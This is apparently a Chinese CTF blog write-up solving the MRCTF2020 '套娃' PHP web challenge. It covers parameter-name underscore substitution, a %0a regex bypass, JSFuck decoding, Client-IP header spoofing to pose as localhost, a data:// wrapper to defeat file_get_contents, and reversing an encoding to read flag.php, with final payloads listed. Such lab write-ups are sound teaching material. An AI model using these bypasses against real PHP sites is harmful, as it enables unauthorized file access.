练[MRCTF2020]套娃

[MRCTF2020]套娃


在这里插入图片描述

掌握知识

​ 参数的_符号的替换,正则和强等于联合绕过,jsfuck编码,bp请求方式的转变,本地ip的请求头,代码审计,简单的字符串解密和加密函数之间的逆推构造,file_get_contents函数的绕过

解题思路

  1. 打开题目链接,发现界面没什么内容,查看源码发现了一串代码,代码还算简单,获取参数不能有_,下面传参的内容不能等于23333,但还要以23333开头和结尾,经典矛盾

image-20231007164434488

代码分析1
  1. 对于第一个判断,因为参数是b_u_p_t,肯定是有_的,但是php解析中,可以把.和空格都当做_解析,所以构建参数为b.u.p.t。第二个矛盾的判断,很明显肯定是23333结尾加一点特殊字符满足前后两个条件。这里可以使用换行符%0a,正则匹配不会把该符号当作内容进行匹配,所以并不会影响23333开头结尾的匹配,而接受参数的变量会把整体内容都保存,所以就不会和23333相等了,即可通过判断

image-20231007165139458

  1. 通过判断后提示flag在一个文件中,访问之后提示需要被登录,查看了一下源码发现了一串被注释的jsfuck编码,将其在线网站解密后得到需要进行post传参Merak

image-20231007165132244

image-20231007165401288

image-20231007165355727

  1. 抓包之后,右键切换请求方式,进行post传参,查看相应界面发现了一串代码,根据代码内容很明显这是套娃的最后一步了

image-20231007165525710

include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?> 
代码分析2
  1. 对代码进行分析,post传参merak就会显示源代码,但是代码也就终止了。第一个判断是要求ip地址为127.0.0.1,这个使用XFF头就能通过,但是这里对XFF进行了过滤,使用其他的请求头功能也一样,client-ip:127.0.0.1。第二个判断是需要绕过file_get_contents函数,只需要使用data协议或者phpinput协议将后面的内容输出传递即可绕过
if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 
if($ip!='127.0.0.1')
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' )
  1. 通过判断就能进行文件读取了,但是还要经过change函数,该函数先对字符串进行base64解密,再对每一位字符进行特殊运算。这种也很好解决,只需要写个代码将解密代码顺序进行颠倒,即可还原加密后的字符串,通过该解密函数后就能得到正常的文件名了
# 解密
function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
# 加密
str1="flag.php"
str2=''
for i in range(len(str1)):
    str2+=chr(ord(str1[i])-i*2)
print(str2)
# fj]a&f\b
  1. 将逆推得到的文件名进行base64编码,即可完成加密文件名过程,接下来就是进行GET传参了,将2333file赋予分析得到的paylaod,传参之后即可拿下flag

image-20231007170531947

image-20231007170554036

关键paylaod

b.u.p.t=23333%0a

Merak=   # post传参

client-ip:127.0.0.1

str1="flag.php"
str2=''
for i in range(len(str1)):
    str2+=chr(ord(str1[i])-i*2)
print(str2)
# fj]a&f\b

/secrettw.php?2333=data://text/plain,todat%20is%20a%20happy%20day&file=ZmpdYSZmXGI=
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值